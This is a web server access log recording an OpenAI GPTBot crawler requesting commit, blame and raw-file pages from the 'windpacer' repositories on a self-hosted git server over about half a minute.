"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" -[17/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones" [Client 74.7.227.38] [Length 8456] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels" [Client 74.7.227.38] [Length 7622] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 34285] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html?display=rendered" [Client 74.7.227.38] [Length 14705] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" -[17/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" -[17/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" -[17/Feb/2026:13:26:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" -[17/Feb/2026:13:26:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" -[17/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10760] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" -[17/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" -[17/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" -[17/Feb/2026:13:26:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" -[17/Feb/2026:13:26:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" -[17/Feb/2026:13:26:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/" -[17/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=projects.sln" [Client 74.7.227.38] [Length 22168] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10950] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 11076] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10279] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 11577] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode" [Client 74.7.227.38] [Length 22585] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" -[17/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11883] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:26:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" -[17/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11301] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12757] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:13:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=stars" [Client 74.7.227.38] [Length 7157] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:13:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" [Client 74.7.227.38] [Length 11446] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71831] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" -[17/Feb/2026:13:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 10760] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" -[17/Feb/2026:13:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15177] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" -[17/Feb/2026:13:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12451] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" -[17/Feb/2026:13:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" -[17/Feb/2026:13:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" -[17/Feb/2026:13:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 74.7.227.38] [Length 14252] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" -[17/Feb/2026:13:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 14390] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" -[17/Feb/2026:13:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 13002] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" -[17/Feb/2026:13:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" -[17/Feb/2026:13:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14878] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11210] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" -[17/Feb/2026:13:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" -[17/Feb/2026:13:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" -[17/Feb/2026:13:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" -[17/Feb/2026:13:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] 